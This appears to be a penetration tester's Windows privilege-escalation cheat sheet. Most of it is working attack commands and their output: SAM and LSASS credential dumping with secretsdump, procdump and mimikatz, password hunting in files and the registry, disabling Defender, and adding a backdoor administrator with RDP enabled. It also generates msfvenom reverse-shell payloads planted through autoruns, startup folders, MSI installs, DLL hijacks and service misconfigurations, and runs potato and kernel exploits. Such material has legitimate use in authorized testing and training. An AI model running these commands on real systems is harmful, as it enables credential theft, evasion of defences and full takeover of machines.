Windows Privlage Escalation

Resources

https://lolbas-project.github.io/
https://wadcoms.github.io/

Windows 10 Exploits:

https://github.com/nu11secur1ty/Windows10Exploits

Low Hanging Fruit

whoami /priv 
SeImpersonatePrivilege -> PrintSpoofer, Juicy Potato, Rogue Potato, Hot Potato
SeAssignPrimaryTokenPrivilege -> Juicy Potato 
SeTakeOwnershipPrivilege ->  become the owner of any object and modify the DACL to grant access.  
SeBackup-> can create copy of sam system and run impacket script to dump hashes


If the machine is >= Windows 10 1809 & Windows Server 2019 - Try Rogue Potato
If the machine is < Windows 10 1809 < Windows Server 2019 - Try Juicy Potato

Check the current tokens you have and any ability to escalate from your tokens

https://github.com/gtworek/Priv2Admin
https://ppn.snovvcrash.rocks/pentest/infrastructure/post-exploitation

SeBackupPrivilege

from sliver session can see privs
https://github.com/gtworek/Priv2Admin/blob/master/SeBackupPrivilege.md

getprivs

Privilege Information for cicada.htb.exe (PID: 3848)
----------------------------------------------------

Process Integrity Level: High

Name                          	Description                    	Attributes
====                          	===========                    	==========
SeBackupPrivilege             	Back up files and directories  	Enabled, Enabled by Default
SeRestorePrivilege            	Restore files and directories  	Enabled, Enabled by Default
SeShutdownPrivilege           	Shut down the system           	Enabled, Enabled by Default
SeChangeNotifyPrivilege       	Bypass traverse checking       	Enabled, Enabled by Default
SeIncreaseWorkingSetPrivilege 	Increase a process working set 	Enabled, Enabled by Default

backup the registry hives

cmd /c "reg save HKLM\SAM SAM & reg save HKLM\SYSTEM SYSTEM"
cmd /c "reg save HKLM\SAM SAM & reg save HKLM\SYSTEM SYSTEM"

download files and then use impacket secretsdump.py

python3 /opt/impacket/examples/secretsdump.py -sam SAM -system SYSTEM LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Credentials in Process Command Lines

Processes may have credentials passed as command line arguments. Always check running processes.

# PowerShell - Get full command lines
Get-CimInstance Win32_Process | Select-Object ProcessId,Name,CommandLine | Format-List

# WMIC - Full command line
wmic process get processid,name,commandline

Note: For Sliver C2 process enumeration with ps -c -f, see the Sliver guide.

Search for files with passwords in them

Perform a basic search

#in one shot, may take a while
findstr /SI /M "password" *.xml *.ini *.txt  
#seperate commands
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini

dir c:\*password* /s
dir c:\*pass* /s
dir c:\*login* /s
dir c:\*finance* /s
dir c:\*.key /s
dir c:\*.ica /s
dir c:\*.pwd* /s
dir c:\*.config* /s
dir c:\*access* /s

# Powershell finds 
Get-ChildItem -Path "C:\Users" -Filter *.doc -Recurse
Get-ChildItem -Path "C:\Users" -Filter *.xlxs -Recurse
Get-ChildItem -Path "C:\Users" -Filter *.xls -Recurse

Find strings in .config files

dir /s *pass* == *cred** == *vnc* == *.config*

Find all passwords in all files

findstr /spin "password" *.*

Unattended Setup

Unattended Setup is the method by which original equipment manufacturers (OEMs), corporations, and other users install Windows NT in unattended mode."
Unattended Setup is the method by which original equipment manufacturers (OEMs), corporations, and other users install Windows NT in unattended mode." It is also where users passwords are stored in base64. Navigate to:
Password files that could have base64 encoded credentials

Unattended files
dir C:\Windows\sysprep\sysprep.xml
dir C:\Windows\sysprep\sysprep.inf
dir C:\Windows\sysprep.inf
dir C:\Windows\Panther\Unattended.xml
dir C:\Windows\Panther\Unattend.xml
dir C:\Windows\Panther\Unattend\Unattend.xml
dir C:\Windows\Panther\Unattend\Unattended.xml
dir C:\Windows\System32\Sysprep\unattend.xml
dir C:\Windows\System32\Sysprep\unattended.xml
dir C:\unattend.txt
dir C:\unattend.inf
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

dir C:\*.vnc.ini /s /b
dir C:\*ultravnc.ini /s /b
dir C:\ /s /b | findstr /si *vnc.ini

Search Registry for Passwords

reg query HKLM /f password /t REG_SZ /s      #admin needed
reg query HKCU /f password /t REG_SZ /s

Powershell

powershell.exe -nop -ep bypass    
Get-ExecutionPolicy    
Set-ExecutionPolicy Unrestricted   
Set-MpPreference -DisableRealtimeMonitoring $true

Powershell history
Windows powershell saves all previous commands into a file called ConsoleHost_history.txt This is located at:

dir %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Windows Kernel Versions

systeminfo

Kernel 6.1 - Windows 7 / Windows Server 2008 R2  
Kernel 6.2 - Windows 8 / Windows Server 2012  
Kernel 6.3 - Windows 8.1 / Windows Server 2012 R2  
Kernel 10 - Windows 10 / Windows Server 2016 / Windows Server 2019 / Windows 11 / Windows Server 2022

Important Files

dir %SYSTEMROOT%\System32\drivers\etc\hosts                   #local DNS entries 
dir %SYSTEMROOT%\System32\drivers\etc\networks                #network config
dir %SYSTEMROOT%\Prefetch                                     #prefetch dir, exe logs
dir %WINDIR%\system32\config\AppEvent.Evt                     #application logs
dir %WINDIR%\system32\config\SecEvent.Evt                     #security logs

Scripts

You might want to check for AV first! Scripts Reference

winPEAS Other compiled binaries nishang JAWS PowerSploit PrivEscCheck Windows Exploit Suggester (Next-Generation) Sherlock Priv2Admin OS privileges to system

Compiled scripts here

Run PowerUp

. .\PowerUp.ps1
Invoke-AllChecks

Kernel Exploits

https://github.com/SecWiki/windows-kernel-exploits

Admin Service that a Standard User can run

https://www.youtube.com/watch?v=3BQKpPNlTSo

Run Executable in Background

start /B program

Disable/Enable Group Policy

Disable:

REG add "HKCU\Software\Policies\Microsoft\MMC{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}" /v Restrict_Run /t REG_DWORD /d 1 /f

enable

REG add "HKCU\Software\Policies\Microsoft\MMC{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}" /v Restrict_Run /0 REG_DWORD /d 1 /f

Add Admin and Enable RDP

Add Admin & Enable RDP
net user /add hacked Password1
net localgroup administrators hacked /add
net localgroup Administrateurs hacked /add (For French target)
net localgroup "Remote Desktop Users" hacked /add
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service type = REMOTEDESKTOP mode = ENABLE scope = CUSTOM addresses = 10.0.0.1

SMB File Transfer

On kali box:

sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .

On Windows (update the IP address with your Kali IP):

copy \\10.10.10.10\kali\reverse.exe C:\PrivEsc\reverse.exe

xfreerdp

xfreerdp /v:10.10.25.227 /u:Wade /p:parzival /cert:ignore /drive:/usr/share/windows-resources,share /dynamic-resolution
proxychains -f proxy9051.conf xfreerdp +clipboard /v:10.10.120.5 /d:RLAB /u:'SQL01$' /pth:47b071ssddff02d0f06770137996c /sec:nla /cert:ignore /drive:/home/kali/Documents/htb/rasta/map,share

Credit

Taken from Tib3rius

Basic Enumeration

Find out the users on the box and enumerate their privlages

net users
net users Administrator

Registry Escalation - Autoruns

Detection
Open command prompt and type:

C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe

In Autoruns, click on the Logon tab.
From the listed results, notice that the “My Program” entry is pointing to

C:\Program Files\Autorun Program\program.exe

In command prompt type:

C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"

From the output, notice that the "Everyone" user group has "FILE_ALL_ACCESS" permission on the "program.exe" file.
Exploitation
Kali VM
Open command prompt and type: msfconsole
In Metasploit (msf > prompt) type: use multi/handler
In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp or windows/x64/shell/reverse_tcp
In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
In Metasploit (msf > prompt) type: run
Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe
Copy the generated file, program.exe, to the Windows VM.
Windows VM
Place program.exe in C:\Program Files\Autorun Program
To simulate the privilege escalation effect, logoff and then log back on as an administrator user.
Kali VM
Wait for a new session to open in Metasploit.
In Metasploit (msf > prompt) type: sessions -i [Session ID]
To confirm that the attack succeeded, in Metasploit (msf > prompt) type: getuid

Registry Escalation AlwaysInstallElevated

Detection
Windows VM
Open command prompt and type:

reg query HKLM\Software\Policies\Microsoft\Windows\Installer

From the output, notice that AlwaysInstallElevated value is 1.
In command prompt type:

reg query HKCU\Software\Policies\Microsoft\Windows\Installer

From the output, notice that AlwaysInstallElevated value is 1.
Exploitation
Kali VM
Open command prompt and type: msfconsole
In Metasploit (msf > prompt) type: use multi/handler
In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp or windows/shell_reverse_tcp
In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
In Metasploit (msf > prompt) type: run
Open an additional command prompt and type:

msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f msi -o setup.msi

Copy the generated file, setup.msi, to the Windows VM.

Windows VM

Place setup.msi in C:\Temp.
Open command prompt and type:

msiexec /quiet /qn /i C:\Temp\setup.msi

Service Escalation via Changing binpath

Query the interesting service

sc.exe qc IObitUnSvr
SERVICE_NAME: IObitUnSvr
        TYPE               : 10  WIN32_OWN_PROCESS 
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : 
        LOAD_ORDER_GROUP   : 
        TAG                : 0
        DISPLAY_NAME       : IObit Uninstaller Service
        DEPENDENCIES       : 
        SERVICE_START_NAME : LocalSystem

You notice that you cannot swap out the legit exe, or modify the directory the exe is in, however you can edit the binpath

sc.exe config IObitUnSvr binPath= "C:\Users\dharding\Desktop\sliver.exe"
[SC] ChangeServiceConfig SUCCESS
PS C:\Windows\System32\spool\drivers\color> sc.exe start IObitUnSvr
sc.exe start IObitUnSvr
# get session
[*] Session 12b37889 dante-dc01 - 10.10.14.2:52042 (LOCAL-WS02) - windows/amd64 - Tue, 07 May 2024 18:18:15 EDT

Startup Applications

Detection
Windows VM
Open command prompt and type: icacls.exe

"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

From the output notice that the BUILTIN\Users group has full access (F) to the directory.
Exploitation
Kali VM
Open command prompt and type: msfconsole
In Metasploit (msf > prompt) type: use multi/handler
In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp or windows/shell_reverse_tcp
In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
In Metasploit (msf > prompt) type: run
Open another command prompt and type: msfvenom -p windows/shell_reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe
Copy the generated file, x.exe, to the Windows VM.
Windows VM
Place x.exe in "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
Logoff.
Login with the administrator account credentials.
Kali VM
Wait for a session to be created, it may take a few seconds.
In Meterpreter(meterpreter > prompt) type: getuid or whoami
From the output, notice the user is User-PC\Admin

DLL Hijacking

Detection
Windows VM
Open the Tools folder that is located on the desktop and then go the Process Monitor folder.
In reality, executables would be copied from the victim’s host over to the attacker’s host for analysis during run time.
Alternatively, the same software can be installed on the attacker’s host for analysis, in case they can obtain it. To simulate this, right click on Procmon.exe and select Run as administrator from the menu.
In procmon, select filter. From the left-most drop down menu, select Process Name.
In the input box on the same line type: dllhijackservice.exe
Make sure the line reads Process Name is dllhijackservice.exe then Include and click on the Add button, then Apply and lastly on OK.
Next, select from the left-most drop down menu Result.
In the input box on the same line type: NAME NOT FOUND
Make sure the line reads Result is NAME NOT FOUND then Include and click on the Add button, then Apply and lastly on OK.
Open command prompt and type:

sc start dllsvc

Scroll to the bottom of the window. One of the highlighted results shows that the service tried to execute C:\Temp\hijackme.dll yet it could not do that as the file was not found. Note that C:\Temp is a writable location.
Exploitation
Windows VM
Copy C:\Users\User\Desktop\Tools\Source\windows_dll.c to the Kali VM.
Kali VM
Open windows_dll.c in a text editor and replace the command used by the system() function to: cmd.exe /k net localgroup administrators user /add
Exit the text editor and compile the file by typing the following in the command prompt: x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll
Copy the generated file hijackme.dll, to the Windows VM.
Windows VM
Place hijackme.dll in C:\Temp.
Open command prompt and type: sc stop dllsvc & sc start dllsvc
It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt:

net localgroup administrators

Service Escalation binPath

Detection
Windows VM
Open command prompt and type:

C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc daclsvc

Notice that the output suggests that the user User-PC\User has the SERVICE_CHANGE_CONFIG permission.
Exploitation
Windows VM
In command prompt type: sc config daclsvc binpath= "net localgroup administrators user /add"
In command prompt type: sc start daclsvc
It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

Unquoted Service Path

Find vulnerable services with this command without PowerUp

Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

Open command prompt and type: sc qc unquotedsvc
Notice that the BINARY_PATH_NAME field displays a path that is not confined between quotes.
Exploitation
Kali VM
Open command prompt and type: msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
Copy the generated file, common.exe, to the Windows VM.
Windows VM
Place common.exe in "C:\Program Files\Unquoted Path Service".
Open command prompt and type: sc start unquotedsvc
It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

Hot Potato

Exploitation
Windows VM
In command prompt type: powershell.exe -nop -ep bypass
In Power Shell prompt type: Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1
In Power Shell prompt type: Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
To confirm that the attack was successful, in Power Shell prompt type: net localgroup administrators

Password Mining Escalation Configuration Files

Exploitation
Windows VM
Open command prompt and type: notepad C:\Windows\Panther\Unattend.xml
Scroll down to the "<Password>" property and copy the base64 string that is confined between the "<Value>" tags underneath it.
Kali VM
In a terminal, type: echo [copied base64] | base64 -d
Notice the cleartext password

Password Mining Escalation Memory

Exploitation
Kali VM
Open command prompt and type: msfconsole
In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic
In Metasploit (msf > prompt) type: set uripath x
In Metasploit (msf > prompt) type: run
Windows VM
Open Internet Explorer and browse to: http://[Kali VM IP Address]/x
Open command prompt and type: taskmgr
In Windows Task Manager, right-click on the iexplore.exe in the Image Name columnand select Create Dump File from the popup menu.
Copy the generated file, iexplore.DMP, to the Kali VM.
Kali VM
Place iexplore.DMP on the desktop.
Open command prompt and type: strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
Select the Copy the Base64 encoded string.
In command prompt type: echo -ne [Base64 String] | base64 -d
Notice the credentials in the output.

Kernal Exploits

Establish a shell
Kali VM
Open command prompt and type: msfconsole
In Metasploit (msf > prompt) type: use multi/handler
In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
In Metasploit (msf > prompt) type: run
Open an additional command prompt and type: msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe > shell.exe
Copy the generated file, shell.exe, to the Windows VM.
Windows VM
Execute shell.exe and obtain reverse shell
Detection & Exploitation
Kali VM
In Metasploit (msf > prompt) type: run post/multi/recon/local_exploit_suggester
Identify exploit/windows/local/ms16_014_wmi_recv_notif as a potential privilege escalation
In Metasploit (msf > prompt) type: use exploit/windows/local/ms16_014_wmi_recv_notif
In Metasploit (msf > prompt) type: set SESSION [meterpreter SESSION number]
In Metasploit (msf > prompt) type: set LPORT 5555
In Metasploit (msf > prompt) type: run

LSASS Credential Dumping

use procdump

procdump.exe -accepteula -ma lsass.exe C:\Users\Administrator\Desktop\lsass.dmp
#either exfil or perform locally 
mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonpasswords

Previouspowershell-cheatsheet NextAnti-Virus Evasion

Last updated 4 days ago

hashtagWindows Privlage Escalation

hashtagResources

hashtagLow Hanging Fruit

hashtagSeBackupPrivilege

hashtagCredentials in Process Command Lines

hashtagSearch for files with passwords in them

hashtagUnattended Setup

hashtagSearch Registry for Passwords

hashtagPowershell

hashtagWindows Kernel Versions

hashtagImportant Files

hashtagScripts

hashtagRun PowerUp

hashtagKernel Exploits

hashtagAdmin Service that a Standard User can run

hashtagRun Executable in Background

hashtagDisable/Enable Group Policy

hashtagAdd Admin and Enable RDP

hashtagSMB File Transfer

hashtagxfreerdp

hashtagBasic Enumeration

hashtagRegistry Escalation - Autoruns

hashtagRegistry Escalation AlwaysInstallElevated

hashtagService Escalation via Changing binpath

hashtagStartup Applications

hashtagDLL Hijacking

hashtagService Escalation binPath

hashtagUnquoted Service Path

hashtagHot Potato

hashtagPassword Mining Escalation Configuration Files

hashtagPassword Mining Escalation Memory

hashtagKernal Exploits

hashtagLSASS Credential Dumping